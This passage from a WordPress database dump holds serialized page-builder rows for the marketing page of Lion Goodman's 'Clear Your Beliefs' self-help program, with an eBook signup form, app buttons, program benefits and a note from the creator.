(1118, 1603, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:732:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-bottom: 44px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:880:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:719:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1121, 1606, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:687:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1122, 1607, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:437:"<center style="margin-top: -122px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:730:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n</center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;">\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/04f73722bf7196ce6789ed3e003f8218"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:691:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 52px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPHONE APP[/su_button]\n[su_button url="#" background="#253aa4" size="9"]DOWNLOAD iPAD APP[/su_button]\n\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <big><strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong></big>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence</center>\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong>\n[su_button url="#" background="#253aa4" size="9"]LEARN MORE[/su_button] [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1386:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n\n<b>The <em>Clear Your Beliefs</em> Program will help you:</b>\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column]\n[/su_row]\n\n<b>How and Why It Works So Well</b>\n<ul>\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2708:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em, our free app.\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier.  The resistance and blocks that have held you back just melt away ­­– like magic.  And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy?  And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:508:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the &lt;em&gt;Clear Your Beliefs&lt;/em process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 